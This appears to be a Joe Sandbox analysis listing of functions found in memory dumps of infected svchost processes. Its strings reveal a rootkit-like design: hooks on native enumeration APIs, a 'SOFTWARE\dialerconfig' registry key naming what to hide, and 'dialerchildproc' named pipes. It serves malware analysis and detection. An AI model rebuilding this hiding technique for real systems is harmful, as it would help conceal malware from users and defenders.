Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: b6ec0e3822f44f4974ba45c3b4ad031aafea858d39a4be114183cc4bad7c1915
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 4211F736708B9096DB618B5AB44429AB7A4F789BD0F944126EACD83B59DF38C4A1CB40

Function 000002295D5694A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002295D5694E8
RaiseException.KERNEL32 ref: 000002295D56952E

Strings

csm, xrefs: 000002295D56951B

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 4206efeffc6ca744a8ee94f67e3cfb921d441615101c791e442dbefb7a6d9b88
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 4B111F32214B8092EB618F59F44425977A5F788B98F584225EF9D0B768DF38C5A6CB00

Function 000002295D56D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002295D56D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002295D56D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002295D56D681

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: ec8b7fb54daf39842dfd8d2727fb0fe77053afe0efa68e6c8063deca0273b5df
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: B0F08921710790A1FB175BD9F4485556321A788BD0FE85416FA5903B5CCE38C5F6C720

Function 000002295D53CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002295D53CBC5

Strings

October, xrefs: 000002295D53CBBE
November, xrefs: 000002295D53CBA8, 000002295D53CBB2

Memory Dump Source

Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 422ad1516d5ea61ae22fb89c8dd9457b7e4e0eded744485d61e6f54fbbe180c5
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 58E09221308941B2EA079FDDF44C2E472619F94740FE9A021F9190625EDE3CC8F78361

Function 000002295D56D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002295D56D631
TlsSetValue.KERNEL32 ref: 000002295D56D648

Strings

FlsSetValue, xrefs: 000002295D56D61E

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: b9f947fcaab863fd034a458c7f8bf2b871c006b774413eff4daedb7773ba97b7
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: F9E0E561310640B1FE175BD9F84D6A56262AB887C0FE89526F6590635DCE38C8F7C720

Function 000002295D561D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002295D561D9B
HeapAlloc.KERNEL32 ref: 000002295D561DAA
GetProcessHeap.KERNEL32 ref: 000002295D561E1E
HeapFree.KERNEL32 ref: 000002295D561E2C

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: d49fae6660e039afaef4af6e963e2af9471fcf4aa3129fb68c4f1e8e86d27fa2
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: B7218322705B8095EF128F9DF40866AF7A0FB84BA4F954120EE8C47B18EE78C5A3C710

Function 000002295D561274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002295D56127A
HeapAlloc.KERNEL32 ref: 000002295D561289
GetProcessHeap.KERNEL32 ref: 000002295D5612A3
HeapAlloc.KERNEL32 ref: 000002295D5612B4

Memory Dump Source

Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 6d1deb667d001a1ddb2ab59ec8eef6bc1084919400beab451ae0fb92074640fd
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 1EE06D71711600D6F7058FAAD8083493BE1FB89FA1F98C024CA1907354DF7D84EAC760

Analysis Process: svchost.exePID: 592, Parent PID: 5796COMMON

Execution Graph

Execution Coverage:	0.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	69
Total number of Limit Nodes:	3

Executed Functions

Function 0000025306E6104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000025306E610AB
RegEnumValueW.ADVAPI32 ref: 0000025306E6110E
GetProcessHeap.KERNEL32 ref: 0000025306E61155
HeapAlloc.KERNEL32 ref: 0000025306E61163
GetProcessHeap.KERNEL32 ref: 0000025306E61187
HeapFree.KERNEL32 ref: 0000025306E61195

Strings

d, xrefs: 0000025306E610CE

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 3eb227a90dd505873f50682121a590a1dd474164894a6c42467e29c58437e9ca
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: A6417233214B90D7E761CF95E94879AB7A1F3887C5F008125EB8907B98DF38D268CB04

Function 0000025306E63458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000025306E6347A
PathFindFileNameW.SHLWAPI ref: 0000025306E63489

Part of subcall function 0000025306E63930: StrCmpNIW.SHLWAPI ref: 0000025306E63948

Part of subcall function 0000025306E63878: GetModuleHandleW.KERNEL32 ref: 0000025306E63886
Part of subcall function 0000025306E63878: GetCurrentProcess.KERNEL32 ref: 0000025306E638B4
Part of subcall function 0000025306E63878: VirtualProtectEx.KERNEL32 ref: 0000025306E638D6
Part of subcall function 0000025306E63878: GetCurrentProcess.KERNEL32 ref: 0000025306E638F4
Part of subcall function 0000025306E63878: VirtualProtectEx.KERNEL32 ref: 0000025306E63915

CreateThread.KERNEL32 ref: 0000025306E634D7

Part of subcall function 0000025306E61EB4: GetCurrentThread.KERNEL32 ref: 0000025306E61EBF

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: b4f454186f7518bad22eb1b959e946b12c2d53c60afc66e4c5c4ed66010226e7
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 81117C34610F6181F761D7A1AF0E39A6690B7943C7F443029A9168B1DCEF7AC245C208

Function 0000025306E61C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000025306E61650: GetProcessHeap.KERNEL32 ref: 0000025306E6165B
Part of subcall function 0000025306E61650: HeapAlloc.KERNEL32 ref: 0000025306E6166A
Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E616DA
Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E61707
Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61721
Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E61741
Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E6175C
Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E6177C
Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61797
Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E617B7
Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E617D2
Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E617F2

Sleep.KERNEL32 ref: 0000025306E61C43
SleepEx.KERNELBASE ref: 0000025306E61C49

Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E6180D
Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E6182D
Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61848
Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E61868
Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61883
Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E618A3
Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E618BE
Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E618C8

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: c96dbdf56c7b06dc75e875730af0182cb125b9de197d4399fdb0d2334372bebe
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: AB31F175200F2191FB52DFBAEF4939E12A4AB44BC7F047425AE09C76DEEE34CA50C658

Function 0000025306E63930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 0000025306E63948

Strings

dialer, xrefs: 0000025306E63941

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: d1cd3ae0d87e9f1448effe114ad9020b15a3ec25e0177666e4fb2723d12cce83
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: B2D05E24311B5B86EB64DFE59D892652350AB047DAF44B1208A010319DDB289A8DCB18

Function 00000253067D2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000253067D2A31

Memory Dump Source

Source File: 0000000E.00000002.2959207826.00000253067D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000253067D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_253067d0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: c1b1a8673df87b556c8a500f35a566ad28f2268a4018f20ed08d70a0e42731f4
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 28610222301B6087EA68CF159848778B3A1FB44FD5F549825DF29877CBEA38DA53C708

Non-executed Functions

Function 0000025306E62CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000025306E62D80
lstrlenW.KERNEL32 ref: 0000025306E62FBA

Part of subcall function 0000025306E61A14: OpenProcess.KERNEL32 ref: 0000025306E61A3A
Part of subcall function 0000025306E61A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000025306E61A58
Part of subcall function 0000025306E61A14: PathFindFileNameW.SHLWAPI ref: 0000025306E61A67
Part of subcall function 0000025306E61A14: lstrlenW.KERNEL32 ref: 0000025306E61A73
Part of subcall function 0000025306E61A14: StrCpyW.SHLWAPI ref: 0000025306E61A86
Part of subcall function 0000025306E61A14: CloseHandle.KERNEL32 ref: 0000025306E61A94

GetProcAddress.KERNEL32 ref: 0000025306E62D95

Part of subcall function 0000025306E61554: StrCmpIW.SHLWAPI ref: 0000025306E61585

Part of subcall function 0000025306E63930: StrCmpNIW.SHLWAPI ref: 0000025306E63948

StrCmpNIW.SHLWAPI ref: 0000025306E62DD8
lstrlenW.KERNEL32 ref: 0000025306E62F00

Strings

\Device\Nsi, xrefs: 0000025306E62DCB
NtQueryObject, xrefs: 0000025306E62D8B
ntdll.dll, xrefs: 0000025306E62D79

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 3515bfe7e7b7ab6fad81b4b4882aab1bc66bcefd9e350348560311820e22c634
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 4AB19E32210FA085EBA5CFA5CA4879963A5F744BC6F547026FE09577D8EB35CB44C348

Function 0000025306E67E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000025306E67E8C
RtlCaptureContext.NTDLL ref: 0000025306E67EB9
RtlLookupFunctionEntry.NTDLL ref: 0000025306E67ED3
RtlVirtualUnwind.NTDLL ref: 0000025306E67F14
IsDebuggerPresent.KERNEL32 ref: 0000025306E67F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000025306E67F89
UnhandledExceptionFilter.KERNEL32 ref: 0000025306E67F94

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 3860ca3a9ccc4f61de5fab1c6314edb5ee6f2e5bc74b540e0860344737e3c341
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 98315D72204F9096EB60CFA0E8447EE73A4F784789F44542ADA4D47B99EF38C648C714

Function 0000025306E6FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000025306E6FF67
WriteFile.KERNEL32 ref: 0000025306E7021E
WriteFile.KERNEL32 ref: 0000025306E70270
GetLastError.KERNEL32 ref: 0000025306E70372
GetLastError.KERNEL32 ref: 0000025306E703D2

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 6e2a37bc13749d6f93b8863db0506f35e17443190fa809c6a389f22584975dec
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: CDE121B2714BA09AE700CFA4DA882DE7BB1F3457C9F106116EE4A57BDDDA34C61AC704

Function 0000025306E61650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000025306E6165B
HeapAlloc.KERNEL32 ref: 0000025306E6166A

Part of subcall function 0000025306E61274: GetProcessHeap.KERNEL32 ref: 0000025306E6127A
Part of subcall function 0000025306E61274: HeapAlloc.KERNEL32 ref: 0000025306E61289
Part of subcall function 0000025306E61274: GetProcessHeap.KERNEL32 ref: 0000025306E612A3
Part of subcall function 0000025306E61274: HeapAlloc.KERNEL32 ref: 0000025306E612B4

RegOpenKeyExW.ADVAPI32 ref: 0000025306E616DA
RegOpenKeyExW.ADVAPI32 ref: 0000025306E61707
RegCloseKey.ADVAPI32 ref: 0000025306E61721
RegOpenKeyExW.ADVAPI32 ref: 0000025306E61741
RegCloseKey.ADVAPI32 ref: 0000025306E6175C
RegOpenKeyExW.ADVAPI32 ref: 0000025306E6177C
RegCloseKey.ADVAPI32 ref: 0000025306E61797
RegOpenKeyExW.ADVAPI32 ref: 0000025306E617B7
RegCloseKey.ADVAPI32 ref: 0000025306E617D2
RegOpenKeyExW.ADVAPI32 ref: 0000025306E617F2
RegCloseKey.ADVAPI32 ref: 0000025306E6180D
RegOpenKeyExW.ADVAPI32 ref: 0000025306E6182D
RegCloseKey.ADVAPI32 ref: 0000025306E61848
RegOpenKeyExW.ADVAPI32 ref: 0000025306E61868
RegCloseKey.ADVAPI32 ref: 0000025306E61883
RegOpenKeyExW.ADVAPI32 ref: 0000025306E618A3
RegCloseKey.ADVAPI32 ref: 0000025306E618BE
RegCloseKey.ADVAPI32 ref: 0000025306E618C8

Part of subcall function 0000025306E612C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000025306E61326
Part of subcall function 0000025306E612C8: GetProcessHeap.KERNEL32 ref: 0000025306E61334
Part of subcall function 0000025306E612C8: HeapAlloc.KERNEL32 ref: 0000025306E61345
Part of subcall function 0000025306E612C8: RegEnumValueW.ADVAPI32 ref: 0000025306E613A1
Part of subcall function 0000025306E612C8: GetProcessHeap.KERNEL32 ref: 0000025306E613E9
Part of subcall function 0000025306E612C8: HeapAlloc.KERNEL32 ref: 0000025306E613F7
Part of subcall function 0000025306E612C8: GetProcessHeap.KERNEL32 ref: 0000025306E6141B
Part of subcall function 0000025306E612C8: HeapFree.KERNEL32 ref: 0000025306E61429
Part of subcall function 0000025306E612C8: lstrlenW.KERNEL32 ref: 0000025306E61432
Part of subcall function 0000025306E612C8: GetProcessHeap.KERNEL32 ref: 0000025306E61440
Part of subcall function 0000025306E612C8: HeapAlloc.KERNEL32 ref: 0000025306E6144E

Strings

process_names, xrefs: 0000025306E61775
service_names, xrefs: 0000025306E617EB
pid, xrefs: 0000025306E6173A
udp, xrefs: 0000025306E6189C
SOFTWARE\dialerconfig, xrefs: 0000025306E616BA
paths, xrefs: 0000025306E617B0
tcp_remote, xrefs: 0000025306E61861
tcp_local, xrefs: 0000025306E61826
startup, xrefs: 0000025306E616FD

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 1ca94f53232ef8e48d711fb1114ee597262955cfd922d9b6dab6240cd3b83986
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 44710936310F6085EB50DFA9ED5869E27A5F785BCAF002121EA4D47AACEF38C644D308

Function 0000025306E612C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000025306E61326
GetProcessHeap.KERNEL32 ref: 0000025306E61334
HeapAlloc.KERNEL32 ref: 0000025306E61345
RegEnumValueW.ADVAPI32 ref: 0000025306E613A1

Part of subcall function 0000025306E61554: StrCmpIW.SHLWAPI ref: 0000025306E61585

GetProcessHeap.KERNEL32 ref: 0000025306E613E9
HeapAlloc.KERNEL32 ref: 0000025306E613F7
GetProcessHeap.KERNEL32 ref: 0000025306E6141B
HeapFree.KERNEL32 ref: 0000025306E61429
lstrlenW.KERNEL32 ref: 0000025306E61432
GetProcessHeap.KERNEL32 ref: 0000025306E61440
HeapAlloc.KERNEL32 ref: 0000025306E6144E
StrCpyW.SHLWAPI ref: 0000025306E61470
GetProcessHeap.KERNEL32 ref: 0000025306E61485
HeapFree.KERNEL32 ref: 0000025306E61493

Strings

d, xrefs: 0000025306E61365

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: ea4cb44b8d4bc1762c3c9b222dcaff4fb0d6d3fdd8569e23f7a8df9a4e3e2995
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: D6519E72204F94D3EB54CFA6EA4839AB7A1F788BC5F049124DB4907B98DF38C25AC704

Function 0000025306E61EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000025306E61EBF

Part of subcall function 0000025306E62174: GetModuleHandleA.KERNEL32 ref: 0000025306E6218C
Part of subcall function 0000025306E62174: GetProcAddress.KERNEL32 ref: 0000025306E6219D

Part of subcall function 0000025306E65C10: GetCurrentThreadId.KERNEL32 ref: 0000025306E65C4B

Strings

NtDeviceIoControlFile, xrefs: 0000025306E61FF6
NtEnumerateValueKey, xrefs: 0000025306E61F76
NtQueryDirectoryFileEx, xrefs: 0000025306E61F3C
NtQueryDirectoryFile, xrefs: 0000025306E61F1F
NtResumeThread, xrefs: 0000025306E61F02
NtQuerySystemInformation, xrefs: 0000025306E61EE5
NtEnumerateKey, xrefs: 0000025306E61F59
EnumServiceGroupW, xrefs: 0000025306E61F90
EnumServicesStatusExW, xrefs: 0000025306E61FB1, 0000025306E61FD2
advapi32.dll, xrefs: 0000025306E61F97, 0000025306E61FB8
ntdll.dll, xrefs: 0000025306E61ECD
sechost.dll, xrefs: 0000025306E61FD9

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: f8434084b60d2490b86668ea946a91a06060f361aa750efe63ceeef58b7f8a35
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 9831A274210F6AA4FA04EFE8EF596D92721B7543C7F807423A6191B1ED9E39835DC388

Function 0000025306E623F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000025306E62405
GetCurrentProcessId.KERNEL32 ref: 0000025306E6240F

Part of subcall function 0000025306E619AC: OpenProcess.KERNEL32 ref: 0000025306E619CA
Part of subcall function 0000025306E619AC: IsWow64Process.KERNEL32 ref: 0000025306E619E0
Part of subcall function 0000025306E619AC: CloseHandle.KERNEL32 ref: 0000025306E619FB

CreateFileW.KERNEL32 ref: 0000025306E62468
WriteFile.KERNEL32 ref: 0000025306E62490
ReadFile.KERNEL32 ref: 0000025306E624AF
CloseHandle.KERNEL32 ref: 0000025306E624B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000025306E6243F
\\.\pipe\dialerchildproc64, xrefs: 0000025306E62438

Memory Dump Source

Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 4b9723d83ffef661a2df1093bac8626c59532c343e3a3266cd6f49c48f56047a
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 0A214936614B5083FB10CB65EA4835A77A0F389BE6F505215EA5943BECDF7CC249CB04

Function 0000025306E675F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

